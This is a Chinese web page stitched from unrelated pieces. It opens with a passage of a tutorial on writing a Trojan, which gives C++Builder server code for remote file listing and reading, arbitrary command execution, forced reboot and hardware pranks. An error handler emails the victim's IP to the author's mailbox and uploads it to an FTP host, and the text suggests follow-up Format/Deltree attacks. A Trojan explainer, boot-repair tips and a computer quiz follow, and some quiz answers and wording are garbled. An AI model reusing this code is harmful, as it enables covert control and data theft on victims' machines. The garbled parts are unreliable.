file://将目标文件属性设为隐藏

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib & FA_SYSTEM)

fwrite("S",sizeof(char),1,fp);

file://将目标文件属性设为系统

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib & FA_ARCH)

fwrite("A",sizeof(char),1,fp);

file://将目标文件属性设为普通

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib & FA_DIREC)

fwrite(" <DIR> ",sizeof(char),9,fp);

file://将目标文件属性设为目录

else

fwrite(" ",sizeof(char),9,fp);

file://失败则写入空格

fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);

file://将目录名写入目标文件

fwrite(CR_LF,1,1,fp);

file://写入换行

}

fclose(fp);

file://关闭文件

closedir(dir);

file://关闭目录

FILE *fp1=NULL;

times_of_try=0;

while(fp1==NULL)

{

fp1=fopen(TempFile,"r");

file://打开Win369.bat准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try>100)

{

file://如果已经试了100次了，仍未成功

Socket->SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i<300;i++) temp_content[i]='\0';

file://定义的一个空数组

Read_Num=fread(temp_content,1,300,fp1);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

file://Return_Text变量加上刚才的300个字符

for(int i=0;i<300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp1);

file://重复

};

Return_Text=Return_Text+temp_content;

file://Return_Text变量加上刚才的300个字符

fclose(fp1);

file://关闭目标文件

Socket->SendText(Return_Text);

file://返回Return_Text变量的内容

}

}

够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

{

else if(temp.SubString(0,4)=="type")

{

file://如果前4个字符是“type”

int Read_Num;

int number=temp.Length();

AnsiString File_Name=temp.SubString(6,number-4);

file://将目标文件流存入File_Name变量中

times_of_try=0;

while(fp==NULL)

{

fp=fopen(File_Name.c_str(),"r");

file://打开目标文件准备读

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try>100)

{

file://如果已试了100次了

Socket->SendText("Fail By Open File");

file://返回“Fail By Open File”的错误信息

goto END;

file://跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i<300;i++) temp_content[i]='\0';

file://定义一个空数组

Read_Num=fread(temp_content,1,300,fp);

file://从目标文件中读入前300个字符

while(Read_Num==300)

{

Return_Text=Return_Text+temp_content;

file://Return_Text的内容加上刚才的字符

for(int i=0;i<300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp);

file://重复

};

Return_Text=Return_Text+temp_content;

file://Return_Text的内容加上刚才的字符

fclose(fp);

file://关闭目标文件

Socket->SendText(Return_Text);

file://返回Return_Text的内容，即你查看文件的内容

}

}

咳咳！累死了！还是来点轻松的吧?操纵目标机的光驱（注意：mciSendString()函数的声明在mmsystem.h头文件中）：

{

else if(temp=="open")

{

file://如果收到的temp的内容是“open”

mciSendString("set cdaudio door open", NULL, 0, NULL);

file://就弹出光驱的托盘

}

else if(temp=="close")

{

file://如果收到的temp的内容是“close”

mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

file://就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

}

}

接着就是交换目标机的鼠标左右键，代码如下：

{

else if(temp=="swap")

{

SwapMouseButton(1);

file://交换鼠标左右键，简单吧？

}

}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x?NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

{

else if(temp=="reboot")

{

file://如果收到的temp的内容是“temp”

DWORD dwVersion = GetVersion();

file://得到操作系统的版本号

if (dwVersion < 0x80000000)

{

file://操作系统是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

file://定义变量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken);

file://OpenProcessToken()这个函数的作用是打开一个进程的访问令牌

file://GetCurrentProcess()函数的作用是得到本进程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);

file://LookupPrivilegeValue()的作用是修改进程的权限

tkp.PrivilegeCount = 1;

file://赋给本进程特权

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

file://AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利

ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

file://强行退出WinNt并重启

}

else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

file://强行退出Win9x并重启

}

}

如果以上都不是，就让它在Dos窗口中执行传来的命令：

{

else

{

file://如果都不是

char * CR_TF="\n";

times_of_try=0;

while(fp==NULL)

{

fp=fopen(TempFile,"w+");

file://创建Win369.bat，如果已存在就覆盖

times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try>100)

{

Socket->SendText("Fail By Open File");

file://返回“Fail By Open File”的信息

goto END;

file://跳到END

}

}

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

file://写入欲执行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

file://写入换行符

fclose(fp);

file://关闭Win369.bat

system(TempFile);

file://执行Win369.bat

Socket->SendText("Success");

file://返回“Success”信息

}

}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。^_^

到此，服务器程序的功能已全部完成，但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友，别走开！（未完待续）

木马是如何编写的（三）

武汉 周侃

上次已编写完服务器端的各种功能，但还差容错部分还未完成,下面我们Go on! 其代码如下（照敲不误 ^_^）：

{

END:;

Socket->Close();

file://关闭服务

ServerSocket1->Active =true;

file://再次打开服务

if (NMSMTP1->Connected) NMSMTP1->Disconnect();

file://如果SMTP服务器已连接则断开

NMSMTP1->Host = "smtp.163.net";

file://选一个好用的SMTP服务器，如163、263、sina和amail

NMSMTP1->UserID = "";

file://你SMTP的ID

try

{

NMSMTP1->Connect();

file://再次连接

}

catch(...)

{

goto NextTime;

file://跳到NextTime

}

NMSMTP1->PostMessage->FromAddress ="I don't know!";

file://受害者的Email地址

NMSMTP1->PostMessage->FromName = "Casualty";

file://受害者的名字

NMSMTP1->PostMessage->ToAddress->Text = "crossbow@8848.net";

file://将信发到我的邮箱，这一步很关键

NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ;

file://信的内容提示你“服务器正在运行”，并且告诉你受害者的目前的IP地址，以便连接

NMSMTP1->PostMessage->Subject = "Server Running Now!";

file://信的主题

NMSMTP1->SendMail();

file://发送！

return;

file://返回

NextTime:

NMFTP1->Host = "ftp.go.163";

file://你的FTP服务器的地址

NMFTP1->UserID = "";

file://你的用户ID

NMFTP1->Port = 21;

file://FTP端口号，一般为21

NMFTP1->Password = "";

file://你的FTP的密码

if(NMFTP1->Connected) NMFTP1->Disconnect();

file://如果已连接就断开

try

{

NMFTP1->Connect();

file://再连接

}

catch(...)

{

return;

file://返回

}

AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP;

file://受害者的IP地址

FILE * Upload;

Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+");

file://创建一个新文件准备写，如果已存在就覆盖

fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);

file://写入以上的SendToSite的内容

fclose(Upload);

file://写完后关闭此文件

NMFTP1->RemoveDir("public_html");

file://删除public_html目录

NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP);

file://上传！

}

啊，超长的OnClientRead终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件：

#include <stdlib.h>

#include <dirent.h>

#include <fcntl.h>

#include <dos.h>

#include <sys\stat.h>

#include <winbase.h>

#include <stdio.h>

#include <process.h>

#include <io.h>

#include <mmsystem.h>

至此，服务器端（Server）程序已全部

电脑突然蓝屏开机就出现。ctrl+alt+del

一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

(1)硬件部分：建立木马连接所必须的硬件实体。 控制端：对服务端进行远程控制的一方。 服务端：被控制端远程控制的一方。 INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

(2)软件部分：实现远程控制所必须的软件程序。 控制端程序：控制端用以远程控制服务端的程序。 木马程序：潜入服务端内部，获取其操作权限的程序。 木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。 控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马 程序。

木马原理

用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见下图)，下面我们就按这六步来详细阐述木马的攻击原理。

一.配置木马

一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方 面功能：

(1)木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会用多种伪装手段，如修改图标 ，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。

(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号 ，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。

什么是木马?

特洛伊木马(以下简称木马)，英文叫做“Trojan house”，其名称取自希腊神话的特洛伊木马记。

它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现，会用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具体位置，往往只能望“马”兴叹。

所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。

从木马的发展来看，基本上可以分为两个阶段。

最初网络还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的网络和编程知识。

而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。

所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。

鉴于木马的巨大危害性，我们将分原理篇，防御与反击篇，资料篇三部分来详细介绍木马，希望大家对特洛伊木马这种攻击手段有一个透彻的了解。

原 理 篇

基础知识

在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。

一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

(1)硬件部分：建立木马连接所必须的硬件实体。 控制端：对服务端进行远程控制的一方。 服务端：被控制端远程控制的一方。 INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

(2)软件部分：实现远程控制所必须的软件程序。 控制端程序：控制端用以远程控制服务端的程序。 木马程序：潜入服务端内部，获取其操作权限的程序。 木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。 控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马 程序。

木马原理

用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见下图)，下面我们就按这六步来详细阐述木马的攻击原理。

一.配置木马

一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方 面功能：

(1)木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会用多种伪装手段，如修改图标 ，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。

(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号 ，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。

二.传播木马

(1)传播方式:

木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为 名义， 将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。

(2)伪装方式:

鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目 的。

(一)修改图标

当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提 心吊胆,疑神疑鬼的。

(二)捆绑文件

这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。

(三)出错显示

有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以 为真时,木马却悄悄侵入了 系统。

(四)定制端口

很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在---65535之间任选一个端口作为木马端口(一般不选以下的端口)，这样就给判断 所感染木马类型带 来了麻烦。

(五)自我销毁

这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马 会将自己拷贝到WINDOWS的系统文件夹中(C:\WINDOWS或C:\WINDOWS\SYSTEM目录下)，一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后，原木马文件将自动销毁，这 样服务端用户就很难找到木马的来源，在没有查杀木马的工 具帮助下，就很难删除木马了。

(六)木马更名

安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。

三.运行木马

服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到WINDOWS的 系统文件夹中(C:\WINDOWS或C:\WINDOWS\SYSTEM目录下),然后在注册表,启动组,非启动组中设置好木马 的触发条件 ,这样木马的安装就完成了。安装后就可以启动木马了，具体过程见下图：

(1)由触发条件激活木马

触发条件是指启动木马的条件,大致出现在下面八个地方:

1.注册表:打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。

2.WIN.INI:C:\WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在[windows]字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:\WINDOWS目录下有个配置文件system.ini，用文本方式打开，在[386Enh],[mic]， [drivers32]中有命令行,在其中寻找木马的启动命令。

4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。

5.*.INI:即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。

6.注册表:打开HKEY_CLASSES_ROOT\文件类型\shell\open\command主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的键值,将“C :\WINDOWS \NOTEPAD.EXE %1”该为“C:\WINDOWS\SYSTEM\SYXXXPLR.EXE %1”，这时你双 击一个TXT文件 后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ，通过修改HTML，EXE，ZIP等文件的启动命令的键值都可以启动木马 ，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile,ZIP是WINZIP，大家可以 试着去找一下。

7.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使 木马被删 除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。

8.启动菜单:在“开始---程序---启动”选项下也可能有木马的触发条件。

(2)木马运行过程

木马被激活后，进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下，键入NETSTAT -AN查看端口状态，一般个人电脑在脱机状态下是不会有端口 开放的，如果有端口开放，你就要注意是否感染木马了。下面是电脑感染木马后，用NETSTAT命令查 看端口的两个实例：

其中①是服务端与控制端建立连接时的显示状态，②是服务端与控制端还未建立连接时的显示状态。

在上网过程中要下载软件，发送信件，网上聊天等必然打开一些端口，下面是一些常用的端口：

(1)1---之间的端口：这些端口叫保留端口，是专给一些对外通讯的程序用的，如FTP使用21， SMTP使用25，POP3使用110等。只有很少木用保留端口作为木马端口 的。

(2)1025以上的连续端口：在上网浏览网站时，浏览器会打开多个连续的端口下载文字，到本地 硬盘上，这些端口都是1025以上的连续端口。

(3)4000端口：这是OICQ的通讯端口。

(4)6667端口：这是IRC的通讯端口。 除上述的端口基本可以排除在外，如发现还有其它端口打开，尤其是数值比较大的端口，那就要怀疑 是否感染了木马，当然如果木马有定制端口的功能，那任何端口都有可能是木马端口。

四.信息泄露:

一般来说，设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集 一些服务端的软硬件信息，并通过E-MAIL，IRC或ICO的方式告知控制端用户。下图是一个典型的信息反 馈邮件。

从这封邮件中我们可以知道服务端的一些软硬件信息，包括使用的操作系统，系统目录，硬盘分区况， 系统口令等，在这些信息中，最重要的是服务端IP，因为只有得到这个参数，控制端才能与服务端建立 连接，具体的连接方法我们会在下一节中讲解。

五.建立连接：

这一节我们讲解一下木马连接是怎样建立的 。一个木马连接的建立首先必须满足两个条件：一是 服务端已安装了木马程序；二是控制端，服务端都要在线 。在此基础上控制端可以通过木马端口与服 务端建立连接。为了便于说明我们用图示的形式来讲解。

如上图所示A机为控制端，B机为服务端，对于A机来说要与B机建立连接必须知道B机的木马端口和IP地 址，由于木马端口是A机事先设定的，为已知项，所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的方法主要有两种：信息反馈和IP扫描。对于前一种已在上一节中已经介绍过了，不再赘述，我们 重点来介绍IP扫描，因为B机装有木马程序，所以它的木马端口7626是处于开放状态的，所以现在A机只 要扫描IP地址段中7626端口开放的主机就行了，例如图中B机的IP地址是202.102.47.56，当A机扫描到 这个IP时发现它的7626端口是开放的，那么这个IP就会被添加到列表中，这时A机就可以通过木马的控 制端程序向B机发出连接信号，B机中的木马程序收到信号后立即作出响应，当A机收到响应的信号后， 开启一个随即端口1031与B机的木马端口7626建立连接，到这时一个木马连接才算真正建立。值得一提 的要扫描整个IP地址段显然费时费力，一般来说控制端都是先通过信息反馈获得服务端的IP地址，由于 拨号上网的IP是动态的，即用户每次上网的IP都是不同的，但是这个IP是在一定范围内变动的，如图中 B机的IP是202.102.47.56，那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255，所以 每次控制端只要搜索这个IP地址段就可以找到B机了。

六.远程控制：

木马连接建立后，控制端端口和木马端口之间将会出现一条通道，见下图

控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远 程控制。下面我们就介绍一下控制端具体能享有哪些控制权限，这远比你想象的要大。

(1)窃取密码：一切以明文的形式，*形式或缓存在CACHE中的密码都能被木马侦测到，此外很多木马还 提供有击键记录功能，它将会记录服务端每次敲击键盘的动作，所以一旦有木马入侵， 密码将很容易被窃取。

(2)文件操作：控制端可藉由远程控制对服务端上的文件进行删除,新建,修改,上传,下载,运行,更改属 性等一系列操作,基本涵盖了WINDOWS平台上所有的文件操作功能。

(3)修改注册表：控制端可任意修改服务端注册表，包括删除，新建或修改主键，子键，键值。有了这 项功能控制端就可以禁止服务端软驱，光驱的使用，锁住服务端的注册表，将服务端 上木马的触发条件设置得更隐蔽的一系列高级操作。

(4)系统操作：这项内容包括重启或关闭服务端操作系统，断开服务端网络连接，控制服务端的鼠标， 键盘，监视服务端桌面操作，查看服务端进程等，控制端甚至可以随时给服务端发送信 息，想象一下，当服务端的桌面上突然跳出一段话，不吓人一跳才怪

电脑一键锁屏快捷键

开机直接显示CTRL+ALT+DEL说明无法进行目标启动。

有以下几种会导致CTRL+ALT+DEL建议重启操作的错误。

DVD模式启动，说明当前bios设置无法启动光盘的启动文件。

USB模式启动，说明无法启动闪存盘或移动硬盘或usb接口的外置光驱内的启动文件或不存在启动文件。

硬盘模式启动，有多种错误会导致无法启动。

①硬盘电源线或数据线松脱；

②硬盘报废；

③引导文件错误、丢失或损坏；

④系统盘分区表文件丢失；

⑤人为操作误删系统文件；

⑥攻击导致系统崩溃。

修复方法如下：

DVD模式无法启动，建议更换有效的光盘进行启动；

USB模式无法启动，建议重做闪存盘、移动硬盘的启动文件，光盘更换有效光盘重新启动；

硬盘电源线、数据线松脱，直接拆开机箱，检查线路是否插口牢固；

硬盘报废，更换硬盘；

引导文件错误、丢失或损坏，可以利用PE系统的修复引导进行修复；

系统盘分区表文件丢失，用PE系统的分区神器查找分区表并保存；

人为操作误删系统文件和攻击导致系统崩溃则只能恢复出厂设置或重新安装系统。如果有正版光盘，可以如下操作：

①插入Windows的安装光盘，重启电脑。

②当出现"Press any key to continue..."时，任意按下字母键，进入安装界面。

③出现中文界面时，选择“使用故障管理恢复控制台修复Windows”，出现“要登录到哪个Windows安装？”时，默认输入 1 ，按下回车键(若电脑有设置开机密码，则需要在此时输入管理员的密码)。

④输入下列的内容，每输入一行按一下回车键。文中的H：\指的是光驱盘符。如果不行，把H换成 D、E、F等即可。

C:\

copy H:\I386\NTLDR C:\

⑤若出现是否替换原有文件的提示，只需要输入Y后按回车，确定替换即可。然后重启电脑，便可以进入windows系统

找一些计算机常识题目

电脑一键锁屏快捷键是WIN+L。

如果你的计算机连接到网络域，那么按下快捷键会锁定计算机；如果没有连接到网络域，则会切换用户。锁定计算机的作用是在不退出系统的情况下，将计算机返回到用户登录界面。这时，你可以选择切换用户或重新登录退出的这个用户。

在需要离开计算机又不想或不便于关机，或者不想让别人使用自己的计算机时，都可以使用锁定计算机的功能。除了WIN+L快捷键，还有其他方法可以锁定计算机。比如，使用Ctrl+Alt+Delete快捷键，单机锁定该计算机就可以将计算机锁定。

电脑一键锁屏的注意事项

在使用电脑一键锁屏功能时，要注意避免误操作。确保在执行锁屏操作之前，没有未保存的工作或重要文件正在进行中。同时，要熟悉电脑的操作系统和锁屏快捷键，以免误按导致不必要的锁屏。保持电脑系统和相关软件的最新更新是确保电脑安全的重要步骤。

定期检查并更新操作系统、杀毒软件和其他安全软件，以提供最新的安全功能和修复潜在的漏洞，从而减少被黑客攻击的风险。在使用电脑一键锁屏功能时，要设置安全的锁屏密码，避免误操作，并定期更新系统和软件，以确保电脑的安全性和数据的保护。

选择题

1>计算机是指（ B ）。（A）一种可传染的细菌（B）一种人为制造的破坏计算机系统的程序（C）一种由操作者传染给计算机的（D）一种由计算机本身产生的破坏程序

2>第一台电脑ENIAC诞生在 （ B ）。

（A）英国 （B）美国 （C）德国 （D）中国

3>下列设备不是输入设备的是（ C ）。

（A）扫描仪 （B）数码相机 （C）显示器 （D）鼠标

4>ROM与RAM的主要区别是（ B ）。

（A）断电后，ROM内保存的信息会丢失，而RAM则可长期保存、不会丢失

（B）断电后，RAM内保存的信息会丢失，而ROM则可长期保存、不会丢失

（C）ROM是外存储器，RAM是内存储器（D）ROM是内存储器，RAM是外存储器

5>CD-ROM是一种大容量的外部存储设备，其特点是（ A ）。（A）只能读不能写 （B）处理数据速度低于软盘（C）只能写不能读 （D）既能写也能读

6>下列不属于字处理软件的是（ D ）。

（A）记事本 （B）写字板 （C）Ｗord （D）画图

7>计算机对于操作计算机的人（ C ）。（A）只会感染，不会致病（B）会感染致病，但无严重危害（C）不会感染（D）产生的作用尚不清楚

8>Enter键是（ B ）。

（A）输入键 （B）回车键 （C）空格键 （D）换档键

9>下列关于“剪贴板”的叙述错误的是（ D ）。

（A）凡是进行“剪切”或“复制”操作时，都可以把选取的信息送到剪贴板中

（B）剪贴板中的信息关机后会自动消失 （C）剪贴板不仅能存入文字，还能存放等

（D）剪贴板中的信息可以自动保存成磁盘文件并长期保存

10>当电子邮件在发送过程中发生错误，则（ B ）。

（A）自动把该邮件删除 （B）原件退回，并注明原因

（C）原件退回，但不注明原因 （D）原件不退回，但告知不能到达

11>以下关于Windows 98的叙述，错误的是（ D ）。

（A）文件名可以包括空格、汉字 （B）Windows 98是多任务的操作系统

（C）屏幕保护程序的作用不是为了保护用户的视力

（D）在同一磁盘中复制文件或文件夹可以用鼠标按住左键直接拖动完成

12>Word的“文件”命令菜单底部显示的文件名所对应的文件是（ C ）。

（A）当前被操作的文件 （B）当前已经打开的所有文件

（C）最近被操作过的文件 （D）扩展名是.DOC的所有文件

13>为了防治已存有信息的软盘被感染，应取的措施是（ B ）。

（A）不要把它与有的软盘放在一起 （B）把它加上写保护的措施后再放入计算机内使用

（C）保护它的清洁 （D）定期对它做格式化的处理

14>下列作为计算机中文件名通配符的是 （ B ）。

（A）>和< （B）*和? （C）+和- （D）*和#

15>设置纸张的大小时，应使用的命令是（ A ）。

（A）"文件" 菜单中的"页面设置"命令 （B）"文件" 菜单中的"工具栏"命令

（C）"视图"菜单中的"工具栏"命令 （D）"视图"菜单中的"页面设置"命令

16>关于中央处理器，下列说法错误的是（ C ）。（A）包括运算器 （B）是计算机处理信息的核心（C）包括CPU和ROM （D）又称CPU

17>在微型计算机中，Modem的中文名称是（ D ）。

（A）网卡 （B）内存 （C）显卡 （D）调制解调器

18>在Windows 98中，下列文件名不正确的是（ C ）。

（A）abc6 （B）5f#6 （C）dk*p （D）doud%

19>下面有关回收站的说法正确的是（ A ）。

（A）回收站可暂时存放被用户删除的文件 （B）用户永久删除的文件存放在回收站中

（C）回收站的文件是不可恢复的 D）回收站中的文件如果被还原，则不一定回到它原来位置

20>在Windows 98环境中同时按下Ctrl+Alt+Del三个键，其作用是（ B ）。

（A）终止当前操作 （B）打开“关闭程序”窗口 （C）关闭计算机 （D）热启动

21>目前使用的微型计算机中微处理器用的电路是（ D ）。

（A）中小规模集成电路 （B）晶体管 （C）电子管 （D）大规模或超大规模集成电路

22>键盘上“DEL”键等同于下面功能（ C ）。

（A）复制 （B）粘贴 （C）删除 （D）重命名

23>计算机感染的可能途径是（ B ）。

（A）从键盘上输入数据（B）软盘或网络（C）软盘表面不清洁（D）电源不稳定

24>下列关于“任务栏”的叙述，哪一项是错误的 （ D ）。

（A）可以将任务栏设置为自动隐藏 （B）任务栏可以移动（C）通过任务栏上的按钮，可实现窗口之间的切换（D）在任务栏上，只显示当前活动窗口名

25>在“显示属性”对话框中，我们不能更改的内容是（ D ）。

（A）桌面背景（B）屏幕保护程序 （C）改变屏幕显示分辨率 （D）改变用户密码

26>当Windows98安装完成后，自动安装的应用程序有（ D ）。

（A）WPS2000 （B）Word2000（C）Excel2000（D）写字板

27>下列对Windows窗口的描述中，错误的是（ D ）。（A）可以对窗口进行“最小化”、“最大化”操作（B）可以同时打开多个窗口，但只有一个活动窗口 （C）可以通过鼠标或键盘进行窗口的切换 （D）可以改变窗口大小，但不能移动

28>计算机中数据的表示形式是 （ C ）。

（A）八进制 （B）十进制 （C）二进制 （D）十六进制

29>"我的电脑"是一个（ D ）。

（A）系统文件夹（B）用户自己创建的文件夹（C）文档文件（D）应用程序文件

30>下列四项内容中，不属于Internet基本功能的是（ D ）。

（A）电子邮件（B）文件传输 （C）远程登录 （D）邮寄包裹

31>下列不属于信息传递方式的是 （ C ）。

（A）上网 （B）发信 （C）思考 （D）看**

32>RAM的中文名字是（ B ）。

（A）只读存储器 （B）随机存储器 （C）运算器 （D）语音教室

33>不属于多媒体处理软件的是（ D ）。

（A）Photoshop （B）Flash （C）PowerPoint （D）Word2000

34>Windows 98中能更改文件名的操作是（ D ）。

（A）用鼠标左键双击文件名，然后选择“重命名”，键入新文件名后按回车键

（B）用鼠标左键单击文件名，然后选择“重命名”，键入新文件名后按回车键

（C）用鼠标右键双击文件名，然后选择“属性”，键入新文件名后按回车键

（D）用鼠标右键单击文件名，然后选择“重命名”，键入新文件名后按回车键

35>关于信息的下列说法，正确的是（ B ）。

（A）信息就是消息（B）信息是指加工处理后的有用的消息

（C）指人们能看到和听到的消息（D）信息是指能用计算机处理的消息

36>第一台电子计算机于是1946年诞生于（ C ）。

（A）中国（B）日本（C）美国（D）英国

